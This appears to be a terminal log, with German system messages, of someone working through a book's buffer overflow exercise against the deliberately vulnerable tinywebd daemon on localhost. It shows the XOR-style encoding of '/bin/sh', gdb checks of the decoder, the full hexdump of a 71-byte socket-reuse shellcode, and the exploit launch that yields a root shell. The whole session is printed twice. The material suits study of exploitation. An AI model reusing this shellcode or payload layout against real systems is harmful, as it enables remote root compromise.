root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000  2f 62 69 6e 2f 73 68 0a                           |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..

Das andere Terminal könnt ihr ja vom Buch übernehmen.

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push   0x8
   0xbffff60d: pop    edx
   0xbffff60e: sub    BYTE PTR [ebx+edx*1],0x5
   0xbffff612: dec    edx
   0xbffff613: jns    0xbffff60e
   0xbffff615: int3  
   0xbffff616: xor    edx,edx
   0xbffff618: push   edx
   0xbffff619: mov    edx,esp
   0xbffff61b: push   ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
42c42
< int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 4c 8b  1a 6a 02 59 31 c0 b0 3f  |....T$L..j.Y1..?|
00000020  cd 80 49 79 f9 b0 0b 68  34 78 6d 05 68 34 67 6e  |..Iy...h4xm.h4gn|
00000030  73 89 e3 6a 08 5a 80 2c  13 05 4a 79 f9 31 d2 52  |s..j.Z.,..Jy.1.R|
00000040  89 e2 53 89 e1 cd 80                              |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000  2f 62 69 6e 2f 73 68 0a                           |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..

Das andere Terminal könnt ihr ja vom Buch übernehmen.

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push   0x8
   0xbffff60d: pop    edx
   0xbffff60e: sub    BYTE PTR [ebx+edx*1],0x5
   0xbffff612: dec    edx
   0xbffff613: jns    0xbffff60e
   0xbffff615: int3  
   0xbffff616: xor    edx,edx
   0xbffff618: push   edx
   0xbffff619: mov    edx,esp
   0xbffff61b: push   ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint before decoding  (REMOVE WHEN NOT DEBUGGING)
42c42
< int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
---
> ;int3  ; breakpoint after decoding  (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 b7 8f  |j.X....t..l$hh..|
00000010  04 08 c3 8d 54 24 4c 8b  1a 6a 02 59 31 c0 b0 3f  |....T$L..j.Y1..?|
00000020  cd 80 49 79 f9 b0 0b 68  34 78 6d 05 68 34 67 6e  |..Iy...h4xm.h4gn|
00000030  73 89 e3 6a 08 5a 80 2c  13 05 4a 79 f9 31 d2 52  |s..j.Z.,..Jy.1.R|
00000040  89 e2 53 89 e1 cd 80                              |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root

   

Websicherheit...  

   
© ALLROUNDER